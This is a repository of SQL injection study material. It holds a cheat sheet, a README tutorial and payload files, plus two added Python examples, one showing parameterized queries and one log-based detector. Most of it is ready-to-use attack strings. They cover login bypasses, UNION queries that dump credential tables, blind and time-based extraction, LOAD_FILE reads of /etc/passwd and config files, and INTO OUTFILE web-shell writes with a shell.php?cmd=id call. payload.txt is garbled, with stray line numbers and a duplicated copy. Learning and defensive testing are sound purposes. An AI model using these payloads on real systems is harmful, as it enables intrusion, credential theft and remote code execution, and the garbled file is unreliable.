├── practice_room
│   └── list
├── cheatsheet-33.md
├── README.md
└── payload
    ├── payload.md
    └── payload.txt

--------------------------------------------------------------------------------
/practice_room/list:
--------------------------------------------------------------------------------
Try Hack Me :

https://tryhackme.com/room/sqlinjectionlm
https://tryhackme.com/room/sqhell

Hack The Box Academy :

https://academy.hackthebox.com/module/33/section/177


Port Swigger:

--------------------------------------------------------------------------------
/cheatsheet-33.md:
--------------------------------------------------------------------------------
## MySQL

| **Command** | **Description** |
| --------------|-------------------|
| **General** |
| `mysql -u root -h docker.hackthebox.eu -P 3306 -p` | Log in to the MySQL database |
| `SHOW DATABASES` | List available databases |
| `USE users` | Switch to database |
| **Tables** |
| `CREATE TABLE logins (id INT, ...)` | Add a new table |
| `SHOW TABLES` | List available tables in current database |
| `DESCRIBE logins` | Show table properties and columns |
| `INSERT INTO table_name VALUES (value_1,..)` | Add values to table |
| `INSERT INTO table_name(column2, ...) VALUES (column2_value, ..)` | Add values to specific columns in a table |
| `UPDATE table_name SET column1=newvalue1, ... WHERE ` | Update table values |
| **Columns** |
| `SELECT * FROM table_name` | Show all columns in a table |
| `SELECT column1, column2 FROM table_name` | Show specific columns in a table |
| `DROP TABLE logins` | Delete a table |
| `ALTER TABLE logins ADD newColumn INT` | Add new column |
| `ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn` | Rename column |
| `ALTER TABLE logins MODIFY oldColumn DATE` | Change column datatype |
| `ALTER TABLE logins DROP oldColumn` | Delete column |
| **Output** |
| `SELECT * FROM logins ORDER BY column_1` | Sort by column |
| `SELECT * FROM logins ORDER BY column_1 DESC` | Sort by column in descending order |
| `SELECT * FROM logins ORDER BY column_1 DESC, id ASC` | Sort by two columns |
| `SELECT * FROM logins LIMIT 2` | Only show first two results |
| `SELECT * FROM logins LIMIT 1, 2` | Only show first two results starting from index 2 |
| `SELECT * FROM table_name WHERE ` | List results that meet a condition |
| `SELECT * FROM logins WHERE username LIKE 'admin%'` | List results where the name is similar to a given string |

## MySQL Operator Precedence
* Division (`/`), Multiplication (`*`), and Modulus (`%`)
* Addition (`+`) and Subtraction (`-`)
* Comparison (`=`, `>`, `<`, `<=`, `>=`, `!=`, `LIKE`)
* NOT (`!`)
* AND (`&&`)
* OR (`||`)

## SQL Injection
| **Payload** | **Description** |
| --------------|-------------------|
| **Auth Bypass** |
| `admin' or '1'='1` | Basic Auth Bypass |
| `admin')-- -` | Basic Auth Bypass With comments |
| [Auth Bypass Payloads](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection#authentication-bypass) |
| **Union Injection** |
| `' order by 1-- -` | Detect number of columns using `order by` |
| `cn' UNION select 1,2,3-- -` | Detect number of columns using Union injection |
| `cn' UNION select 1,@@version,3,4-- -` | Basic Union injection |
| `UNION select username, 2, 3, 4 from passwords-- -` | Union injection for 4 columns |
| **DB Enumeration** |
| `SELECT @@version` | Fingerprint MySQL with query output |
| `SELECT SLEEP(5)` | Fingerprint MySQL with no output |
| `cn' UNION select 1,database(),2,3-- -` | Current database name |
| `cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -` | List all databases |
| `cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -` | List all tables in a specific database |
| `cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -` | List all columns in a specific table |
| `cn' UNION select 1, username, password, 4 from dev.credentials-- -` | Dump data from a table in another database |
| **Privileges** |
| `cn' UNION SELECT 1, user(), 3, 4-- -` | Find current user |
| `cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -` | Find if user has admin privileges |
| `cn' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE user="root"-- -` | Find all user privileges |
| `cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -` | Find which directories can be accessed through MySQL |
| **File Injection** |
| `cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -` | Read local file |
| `select 'file written successfully!' into outfile '/var/www/html/proof.txt'` | Write a string to a local file |
| `cn' union select "",'', "", "" into outfile '/var/www/html/shell.php'-- -` | Write a web shell into the base web directory |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# SQL Injection
![sql-injection](https://user-images.githubusercontent.com/79256105/172219613-c1e688dc-d2fc-4a1c-9e56-35cb868ae5f2.png)

# What is SQL Injection?
SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands.
# Types of SQL Injection
![sql](https://user-images.githubusercontent.com/79256105/175160165-af1189b5-f22c-41fa-8d8e-7e4e1d14da57.png)

## Authentication Bypass (Subverting Query Logic)
Subverting query logic is used to bypass the authentication of a login page. In this technique the attacker submits an always-true statement such as **' or 1=1 / ' or '1'='1'-- -** so that the application's query no longer depends on the user's credentials matching.
Some always-true payloads:

    ' or '1' = '1
    ' or '1' = '1'
    ' or '1' = '1 -- -
    ' or '1' = '1 #
##### 👁️‍🗨️ For more payloads check the PayloadsAllTheThings GitHub repo https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
## In-Band SQL Injection
In simple cases, the output of both the intended and the new query may be printed directly on the front end, and we can directly read it.
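The bypass above works because the application pastes the submitted username into the query text. The following Python example is added here and is not part of this repository: it runs the cheat sheet's `admin' or '1'='1` payload against a login query built by string concatenation and against the same query with bound parameters, using an in-memory SQLite table as a stand-in for MySQL (SQLite's quoting and `AND`/`OR` precedence behave the same way for this case). The users table, the passwords and the function names are constructed for the example.

```python
"""Added example (not the repository's code): the cheat sheet's auth-bypass
payload against a concatenated login query and against the parameterized
form, on an in-memory SQLite table standing in for MySQL."""
import sqlite3

# Constructed sample accounts; the admin password is one the attacker does not know.
SAMPLE_USERS = [("admin", "s3cret-not-guessable"), ("alice", "hunter2")]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Builds the SQL by concatenating untrusted input.  The quote inside the
    payload closes the string literal, and the rest of the payload becomes
    SQL logic: ... WHERE username='admin' or '1'='1' AND password='...'.
    AND binds tighter than OR, so the row for admin matches regardless of
    the password."""
    sql = ("SELECT username FROM users WHERE username='" + username
           + "' AND password='" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str):
    """Same query with bound parameters: the driver passes the values
    separately from the SQL text, so a quote inside them is data, never
    syntax, and the payload is simply a username that does not exist."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def demo() -> dict:
    """Runs both code paths with the cheat sheet's payload and a legitimate login."""
    conn = make_db()
    payload = "admin' or '1'='1"  # auth-bypass payload from the cheat sheet
    return {
        "vulnerable": login_vulnerable(conn, payload, "wrong-password"),
        "parameterized": login_parameterized(conn, payload, "wrong-password"),
        "legit": login_parameterized(conn, "alice", "hunter2"),
    }


if __name__ == "__main__":
    # Expected: {'vulnerable': 'admin', 'parameterized': None, 'legit': 'alice'}
    print(demo())
```

The concatenated query logs the attacker in as `admin` with a wrong password; the parameterized query returns no row for the payload and still works for a real account, which is the whole of the fix.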
This is known as In-band SQL injection, and it has two types: **Union Based and Error Based.**

##### Error Based:
PHP or SQL error messages are returned to the front end.
##### Union Based:
Find the fixed column count and use a UNION query to retrieve database information.

## How to Identify Error Based SQL Injection
#### Step 1:
Find the injectable parameter using fuzzing tools or manually.
#### Step 2:
Use the payloads given below:

| Payload | URL Encoded |
| ------- | ----------- |
| `'` | %27 |
| `"` | %22 |
| `#` | %23 |
| `;` | %3B |
| `)` | %29 |

If we get a SQL error, the parameter is vulnerable to error-based SQL injection; then use sqlmap for automated SQL injection testing, or test manually.
##### 👁️‍🗨️ For more payloads check the PayloadsAllTheThings GitHub repo https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
## How to Identify Union Based SQL Injection
#### Step 1:
Find the actual number of columns using `order by` / `order by -- -`.
#### Step 2:
Use the actual column number in a union operation,
example: `' union select 1,2,3-- -`
#### Step 3:
Check which column number is displayed on the target website.
#### Step 4:
Put the union-based payload in the displayed column number to extract data from the database.

## Method for dumping data from the database using Union SQL Injection

##### Schema/Schemata check

    mysql> SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA;

#### Step 1: Schema/Database check

    ' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -

#### Step 2: Tables check

    ' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -

Here, dev is the database name; replace it with your target database name.

#### Step 3: Columns check

    ' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -

Here, credentials is the table name; replace it with your target table name.

#### Step 4: Dump data from the table:

    ' UNION select 1, username, password, 4 from dev.credentials-- -

where username and password are column names, dev is the database name and credentials is the table name.

## Read Data/Sensitive Files using Union SQL Injection

    SELECT USER()
    SELECT CURRENT_USER()
    SELECT user from mysql.user

#### Step 1: Privilege Check

    SELECT super_priv FROM mysql.user
    ' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- -
    ' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -
    ' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges-- -
#### Step 2: Load File
Now that we know we have enough privileges to read local system files, let us do that using the LOAD_FILE() function. The LOAD_FILE() function can be used in MariaDB / MySQL to read data from files. The function takes in just one argument, which is the file name. The following query is an example of how to read the /etc/passwd file:

    SELECT LOAD_FILE('/etc/passwd');

Example:

    ' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -

#### Another Example

We know that the current page is search.php. The default Apache webroot is /var/www/html. Let us try reading the source code of the file at /var/www/html/search.php.

    ' UNION SELECT 1, LOAD_FILE("/var/www/html/search.php"), 3, 4-- -
    ' UNION SELECT 1, LOAD_FILE("/var/www/html/config.php"), 3, 4-- -
### Write Files Using Union SQL Injection or RCE Using SQL Injection
Example:

    ' union select 1,'file written successfully!',3,4 into outfile '/var/www/html/proof.txt'-- -
Web Shell Upload:

    ' union select "",'', "", "" into outfile '/var/www/html/shell.php'-- -

Basic PHP Web Shell:



OR



### For RCE, Call the Uploaded Web Shell

Example:

    url/upload_file.php?parameter=command

    http://cyberteach360.com.bd/shell.php?cmd=id
# Boolean Based SQL Injection
Boolean based SQL Injection refers to the response we receive back from our injection attempts, which could be true/false, yes/no, on/off, 1/0 or any response which can only ever have two outcomes. That outcome confirms to us whether our SQL Injection payload was successful or not. On first inspection you may feel like this limited response can't provide much information. Still, in fact, with just these two responses it is possible to enumerate a whole database structure and its contents.

#### Step 1: Find out the actual column number

1. `admin123' UNION SELECT 1;--`
2. `admin123' UNION SELECT 1,2,3;--`

If the response is true for 1,2,3 but false for 1,2,3,4, the target column ***number is 3***.

#### Step 2: Find out the database name

    admin123' UNION SELECT 1,2,3 where database() like 'some character%';--
example:

    admin123' UNION SELECT 1,2,3 where database() like 's%';--

Change the character sequentially and check whether the response is true or false.
Suppose we got the ***database name: sqli_three***

#### Step 3: Find out the table name

    admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'sqli_three' and table_name like 'a%';--

Change the character sequentially and check whether the response is true or false.
Suppose we got the ***table name: users***
#### Step 4: Find out the column name

    admin123' UNION SELECT 1,2,3 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='sqli_three' and TABLE_NAME='users' and COLUMN_NAME like 'a%' and COLUMN_NAME !='id';

After repeating this process sequentially you will get the column name.
Suppose the ***column name is username and the other is password***

#### Step 5: Find out the username column value

    admin123' UNION SELECT 1,2,3 from users where username like 'a%

After repeating this process sequentially you will get the ***username column value, which is: admin.***

#### Step 6: Find out the password column value

    admin123' UNION SELECT 1,2,3 from users where username='admin' and password like 'a%

If you do this properly you will get the ***password, and the credentials are username=admin, password=3356***

# Time Based SQL Injection

A time-based blind SQL Injection is very similar to the above Boolean based, in that the same requests are sent, but there is no visual indicator of your queries being wrong or right this time. Instead, your indicator of a correct query is based on the time the query takes to complete. This time delay is introduced by using built-in methods such as ***SLEEP(x)*** alongside the UNION statement. The SLEEP() method will only ever get executed upon a successful UNION SELECT statement.
So, for example, when trying to establish the number of columns in a table, you would use the following query:

    admin123' UNION SELECT SLEEP(5);--

#### Step 1: Find out the actual column number

    admin123' UNION SELECT SLEEP(5);--
If there was no pause in the response time, we know that the query was unsuccessful, so like on previous tasks, we add another column:

    admin123' UNION SELECT SLEEP(5),2;--
If again there is no pause in the response time, increase the column number:

    admin123' UNION SELECT SLEEP(5),2,3;--
#### Step 2: Find out the database name

    admin123' UNION SELECT SLEEP(5),2,3 where database() like 'u%';--
Here the database ***name: sqli_four***
#### Step 3: Find out the table name

    admin123' UNION SELECT SLEEP(5),2,3 FROM information_schema.tables WHERE table_schema = 'sqli_four' and table_name like 'a%';--
Here ***table name: users***

#### Step 4: Find out the column name

    admin123' UNION SELECT SLEEP(5),2,3 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='sqli_four' and TABLE_NAME='users' and COLUMN_NAME like 'a%';
Here column names ***username and password***

#### Step 5: Find out the column values

    admin123' UNION SELECT SLEEP(5),2,3 from users where username like 'a%
Here ***username: admin***

    admin123' UNION SELECT SLEEP(5),2,3 from users where username='admin' and password like 'a%
Here ***password: pass***
So the target login credentials are
***username: admin
password: pass***
## Practicing and Learning Resources:

#### Try Hack Me :

https://tryhackme.com/room/sqlinjectionlm
https://tryhackme.com/room/sqhell

#### Hack The Box Academy :

https://academy.hackthebox.com/module/33/section/177

#### Port Swigger:
https://portswigger.net/web-security/sql-injection

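From the defender's side, every step in this README leaves a recognisable pattern in the request: the probe characters, `UNION SELECT`, `information_schema`, `SLEEP()`/`BENCHMARK()`, `LOAD_FILE()` and `INTO OUTFILE`. The following Python detector is an added example and is not part of this repository: it parses constructed Apache-style access-log lines, URL-decodes the request URI (twice, so double-encoded payloads are still seen) and reports which of those markers each request matches. The log lines, the rule names and the "weak rule" handling are all constructed for the example.

```python
"""Added example (not the repository's code): flag the SQL injection markers
used in the README in web-server access-log request URIs."""
import re
from urllib.parse import unquote_plus

# Each rule is (name, regex) and runs on the decoded, lower-cased request URI.
RULES = [
    ("tautology",    re.compile(r"'\s*or\s*'?\d+'?\s*=\s*'?\d+")),      # ' or '1'='1
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("schema_enum",  re.compile(r"\binformation_schema\.")),
    ("time_delay",   re.compile(r"\b(sleep|benchmark)\s*\(")),
    ("file_access",  re.compile(r"\bload_file\s*\(|\binto\s+outfile\b")),
    ("comment_tail", re.compile(r"(--\s|#|/\*)")),                      # weak on its own
]

# Constructed Apache combined-format lines; none of this is real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /search.php?q=laptop HTTP/1.1" 200 1532
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /search.php?q=cn%27%20UNION%20select%201%2Cdatabase%28%29%2C2%2C3--%20- HTTP/1.1" 200 2210
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /login.php?u=admin123%27%20UNION%20SELECT%20SLEEP%285%29%2C2%2C3%3B-- HTTP/1.1" 200 410
10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /search.php?q=%27%20or%20%271%27%3D%271 HTTP/1.1" 200 1532
10.0.0.5 - - [01/Jan/2024:10:00:11 +0000] "GET /static/app.js HTTP/1.1" 200 9100
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_uri(uri: str) -> str:
    """Decode percent-encoding twice so %2527 (double-encoded quote) is caught."""
    return unquote_plus(unquote_plus(uri)).lower()


def classify(uri: str) -> list:
    """Names of all rules that match the decoded URI, in RULES order."""
    decoded = decode_uri(uri)
    return [name for name, rx in RULES if rx.search(decoded)]


def scan_log(text: str) -> list:
    """Parse each log line and keep those with at least one strong marker.
    comment_tail alone is too noisy (a '#' can appear in ordinary input), so
    it only counts alongside another rule."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip rather than crash the scan
        matched = classify(m["uri"])
        if any(r != "comment_tail" for r in matched):
            hits.append({"ip": m["ip"], "ts": m["ts"], "uri": m["uri"], "rules": matched})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["rules"], hit["uri"])
```

Run over the sample, the scan reports the union, time-based and tautology requests from 10.0.0.7 and 10.0.0.9 and ignores the two ordinary requests; the per-rule names make it straightforward to route time-based probes (which also show up as slow responses) and file-access attempts to different alert severities.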
--------------------------------------------------------------------------------
/payload/payload.md:
--------------------------------------------------------------------------------
0x01 Basics

Check the current database version

VERSION()

@@VERSION

@@GLOBAL.VERSION

Currently logged-in user

USER()

CURRENT_USER()

SYSTEM_USER()

SESSION_USER()

Currently selected database

DATABASE()

SCHEMA()

Path-related variables

@@BASEDIR: MySQL installation path

@@SLAVE_LOAD_TMPDIR: temporary folder path

@@DATADIR: data storage path

@@CHARACTER_SETS_DIR: character set file path

@@LOG_ERROR: error log file path

@@PID_FILE: pid-file path

String concatenation

CONCAT()

GROUP_CONCAT()

CONCAT_WS()

Character and number functions

ASCII(): get the ASCII code of a character

BIN(): return the binary string representation of a value

CONV(): convert a number between bases

FLOOR()

ROUND()

LOWER(): convert to lowercase

UPPER(): convert to uppercase

HEX(): hexadecimal encoding

UNHEX(): hexadecimal decoding

Substring extraction

MID()

LEFT()

SUBSTR()

SUBSTRING()

Comments

Line comments

-- (note the space after --)
DROP sampletable;-- 

#
DROP sampletable;#

` (backtick)

Inline comments
/**/  DROP/*comment*/sampletable;
/*! statement */
/*! select * from test */

The statement inside /*! */ is executed by MySQL.

0x02 Injection techniques

Determining whether a parameter is injectable

Assume the target is: www.test.com/chybeta.php?id=1

Numeric injection

chybeta.php?id=1+1

chybeta.php?id=-1 or 1=1

chybeta.php?id=-1 or 10-2=8

chybeta.php?id=1 and 1=2

chybeta.php?id=1 and 1=1

String injection

The parameter is enclosed in quotes, so we need to close the quotes.

chybeta.php?id=1'

chybeta.php?id=1"

chybeta.php?id=1' and '1'='1

chybeta.php?id=1" and "1"="1

UNION query

Finding the number of columns

In a UNION SELECT injection, the query fails if the injected SELECT does not return the same number of columns as the original query, so the column count has to be determined first.

UNION SELECT

UNION SELECT 1,2,3 #

UNION ALL SELECT 1,2,3 #

UNION ALL SELECT null,null,null #

ORDER BY

Use binary search:

ORDER BY 10 #

ORDER BY 5 #

ORDER BY 2 #

....
Query database names (0x3c62723e is the hex encoding of the separator `<br>`)

UNION SELECT GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.SCHEMATA #

Query table names

UNION SELECT GROUP_CONCAT(table_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE() #

Assuming the database name obtained is "databasename", its hexadecimal encoding is 0x64617461626173656e616d65.

UNION SELECT GROUP_CONCAT(table_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=0x64617461626173656e616d65 #

Query column names

Assuming the previous step returned the table name "tablename", its hexadecimal encoding is 0x7461626c656e616d65.

UNION SELECT GROUP_CONCAT(column_name SEPARATOR+0x3c62723e) FROM+INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x7461626c656e616d65 #

Retrieve data

UNION SELECT GROUP_CONCAT(column_1,column_2 SEPARATOR+0x3c62723e) FROM databasename.tablename #

INSERT / UPDATE / DELETE injection

Reference: SQL Injection in Insert Update and Delete Statements. Assume the back-end statement is:

insert into user(id,name,pass) values (1,"chybeta","123456");

Injection after ORDER BY

This part is compiled from Sleepy Dragon's "MySQL injection primer". Because the sort expression can contain a conditional, the truth of the condition can be inferred from the different sort orders that result.

Detection method
Parameters named order or orderby are likely candidates for this injection. When you know an injectable column, test as follows:
Original link: http://www.test.com/list.php?order=vote sorts by the vote column.

Find the largest vote value, num, then construct the following link and check whether the sort order changes:
list.php?order=abs(vote-(length(user())>0)*num)+asc

Another method needs no column information and uses the rand function:
list.php?order=rand(true)
list.php?order=rand(false)
The two return different sort orders.

payload

The statement to determine whether the first character of the table name is less than 128 is:
http://www.test.com/list.php?order=rand((select char(substring(table_name,1,1)) from information_schema.tables limit 1)<=128))
Error-based injection
Blind injection
Blind scenarios
In many cases the earlier tests show that the page does not echo the extracted data, but the page still changes depending on whether the statement executed successfully.
A correct/incorrect statement produces a modest change in the page: try Boolean-based injection.
A correct statement returns the normal page and an incorrect one returns the generic error page: try Boolean-based injection.
An incorrect statement does not change the page's normal output: try time-based injection.

Some simple conditional constructs; adapt them to the real situation:
CASE
IF()
IFNULL()
NULLIF()
Boolean-based blind (based on the response)
Submit a logical statement to infer one bit of information at a time. Because the injection generally has to be run character by character, scripts or tools (such as Burp Suite) are needed. For example:
payload
// i selects each character position; j narrows down the range of that character's ASCII value.
// k, combined with LIMIT, selects the row at offset k.
// ** can be replaced with other SELECT statements, e.g. to query table names, column names or data, and so on.
// SUBSTR() can also be replaced with SUBSTRING()

' OR (SELECT ASCII(SUBSTR(DATABASE(),i,1) ) < j) #

' OR (SELECT ASCII(SUBSTR((SELECT GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.SCHEMATA),i,1) ) < j) #

' OR (SELECT SUBSTR(DATABASE(),i,1) < j) #

' OR (SELECT SUBSTR((SELECT GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.SCHEMATA),i,1) < j) #

' OR SUBSTR((SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA LIMIT k,1),i,1) < j #

...

Scripts

For using scripts, see "Notes on using scripts for CTF blind injection":

Take care with character encoding
Take care with exception handling
Take care with boundary handling
Time-based blind (based on time)
A few functions are generally used. Their effect is to delay MySQL's execution, so the difference from the normal response time reveals the result:
SLEEP(n): pause MySQL for n seconds
BENCHMARK(count, expr): evaluate the expression expr count times

Some notes:
Time-based blind injection is less accurate because it depends on the current network conditions.
The delay is best kept under 30 seconds, otherwise the MySQL API connection may time out.
When the page shows no visible change at all, consider using time-based injection.
Detection method
1 OR SLEEP(25)=0 LIMIT 1 #
1) OR SLEEP(25)=0 LIMIT 1 #
1' OR SLEEP(25)=0 LIMIT 1 #
') OR SLEEP(25)=0 LIMIT 1 #
1)) OR SLEEP(25)=0 LIMIT 1 #
SELECT SLEEP(25) #

payload

UNION SELECT IF(SUBSTR((SELECT GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.SCHEMATA),i,1) < j,BENCHMARK(100000,SHA1(1)),0)

UNION SELECT IF(SUBSTR((SELECT GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.SCHEMATA),i,1) < j,SLEEP(10),0)

...
Wide byte injection
Principle
Given the following PHP code:
...
mysql_query("SET NAMES 'gbk'");
....
$name = isset($_GET['name']) ? addslashes($_GET['name']) : 1;
$sql = "SELECT * FROM test WHERE names='{$name}'";
addslashes() prefixes single and double quotes with a backslash (\). When MySQL uses the GBK character set, it reads two bytes as one Chinese character, so %df%5c is treated as a single character. If we send name=root%df%27, the server performs the following conversion: root%df%27 -> root%df%5c%27 -> root運'.
More can be seen: Character Encoding and SQL Injection in White Box Audit
payload
Eating the backslash
index.php?name=1%df'
index.php?name=1%a1'
index.php?name=1%aa'
...
After addslashes, %XX%5c appears. If the byte value of the current character is greater than 128 it is treated as the lead byte of a wide character even if the pair is not a Chinese character, so %df is not the only byte that can eat the backslash.
Using the backslash
index.php?name=%**%5c%5c%27
Second-order injection
File read and write
SQL injection can be used to import and export files: read a file's contents or write content to a file. Query the user's file read/write privilege:
SELECT file_priv FROM mysql.user WHERE user = 'username';
LOAD_FILE() read
Conditions
The privilege to read files is needed
The absolute path of the file must be known
The file must be smaller than max_allowed_packet
SELECT @@max_allowed_packet;
payload
Use the absolute path directly; take care with how slashes in the path are escaped.
UNION SELECT LOAD_FILE("C://TEST.txt") #

UNION SELECT LOAD_FILE("C:/TEST.txt") #

UNION SELECT LOAD_FILE("C:\\TEST.txt") #
Using encoding

UNION SELECT LOAD_FILE(CHAR(67,58,92,92,84,69,83,84,46,116,120,116)) #

UNION SELECT LOAD_FILE(0x433a5c5c544553542e747874) #
SELECT ... INTO OUTFILE export
Conditions
The absolute path generally has to be specified
The target directory must be writable
The OUTFILE target must not already exist
payload
UNION SELECT DATABASE() INTO OUTFILE 'C:\\phpstudy\\WWW\\test\\1';

UNION SELECT DATABASE() INTO OUTFILE 'C:/phpstudy/WWW/test/1';

Write webshell
Conditions
The site's absolute path must be known so that the exported webshell can be reached
The target directory must be writable
payload
UNION SELECT "" INTO OUTFILE 'C:/phpstudy/WWW/test/webshell.php';
Universal password login
admin'--
admin'#
admin'/*
or '='or
'or 1=1--
'or 1=1#
'or 1=1/*
') or '1'='1--
') or ('1'='1--
PDO stacked queries
--------------------------------------------------------------------------------
/payload/payload.txt:
--------------------------------------------------------------------------------
1 UNION SELECT 1
1 UNION SELECT 1,2
1 UNION SELECT 1,2,3

If union-based SQL injection is present:

0 UNION SELECT 1,2,database()
0 UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'sqli_one'
0 UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_name = 'staff_users'
0 UNION SELECT 1,2,group_concat(username,':',password SEPARATOR '
') FROM staff_users 11 | 12 | 13 | --------- dump data from 2 different tables ---------- 14 | 15 | http://10.10.8.191/user?id=2%20UNION%20ALL%20SELECT%20%271%20union%20select%201,flag,3,4%20from%20flag%27,%202,3%20from%20users 16 | 17 | 2 UNION ALL SELECT '1 union select 1,flag,3,4 from flag', 2,3 from users 18 | 19 | ------------------- -------------------- 20 | ------------------- -------------------- 21 | 22 | 0x01 basic 23 | Check the current database version 24 | VERSION () 25 | @@ VERSION 26 | @@ GLOBAL.VERSION 27 | Currently logged in user 28 | USER () 29 | CURRENT_USER () 30 | SYSTEM_USER () 31 | SESSION_USER () 32 | Currently used database 33 | DATABASE () 34 | SCHEMA () 35 | Path related 36 | @@ BASEDIR: mysql installation path: 37 | @@ SLAVE_LOAD_TMPDIR: Temporary folder path: 38 | @@ DATADIR: Data Storage Path: 39 | @@ CHARACTER_SETS_DIR: character set file path 40 | @@ LOG_ERROR: error log file path: 41 | @@ PID_FILE: pid-file file path 42 | @@ BASEDIR: mysql installation path: 43 | @@ SLAVE_LOAD_TMPDIR: Temporary folder path: 44 | Joint data 45 | CONCAT () 46 | GROUP_CONCAT () 47 | CONCAT_WS () 48 | Alphanumeric related 49 | ASCII (): Get the ascii code value of the letter 50 | BIN (): The binary string representation of the return value 51 | CONV (): hex conversion 52 | FLOOR () 53 | ROUND () 54 | LOWER (): turn into lowercase letters 55 | UPPER (): converted to capital letters 56 | HEX (): hexadecimal encoding 57 | UNHEX (): hexadecimal decoding 58 | String interception 59 | MID () 60 | LEFT () 61 | SUBSTR () 62 | SUBSTRING () 63 | Comments 64 | Interline comments 65 | - - (- there is a space behind) 66 | DROP sampletable; - 67 | # 68 | DROP sampletable; # 69 | `(Backtick) 70 | Inline comments 71 | / * * / + DROP / * content * / sampletable; 72 | / *! Statement * / 73 | / *! 
select * from test * / 74 | Statement will be executed 75 | 0x02 injection technology 76 | Determine whether there is injection 77 | Assumptions are: www.test.com/chybeta.php?id=1 78 | Numeric injection 79 | chybeta.php?id=1+1 80 | chybeta.php?id=-1 or 1=1 81 | chybeta.php?id=-1 or 10-2=8 82 | chybeta.php?id=1 and 1=2 83 | chybeta.php?id=1 and 1=1 84 | Character injection 85 | The parameters are surrounded by quotes, we need to close the quotes. 86 | chybeta.php?id=1' 87 | chybeta.php?id=1" 88 | chybeta.php?id=1' and '1'='1 89 | chybeta.php?id=1" and "1"="1 90 | Joint inquiry 91 | Query the number of columns 92 | With UNION SELECT injection, if the data to be noted later out of the column with the original number of data columns, it will fail. So need to guess the number of columns. 93 | UNION SELECT 94 | UNION SELECT 1,2,3 # 95 | UNION ALL SELECT 1,2,3 # 96 | UNION ALL SELECT null,null,null # 97 | ORDER BY 98 | Use dichotomy 99 | ORDER BY 10 # 100 | ORDER BY 5 # 101 | ORDER BY 2 # 102 | .... 103 | Query the database 104 | UNION SELECT GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.SCHEMATA # 105 | Query table name 106 | UNION SELECT GROUP_CONCAT(table_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE() # 107 | Assuming to obtain the database name "databasename", its hexadecimal encoding 0x64617461626173656e616d65. 
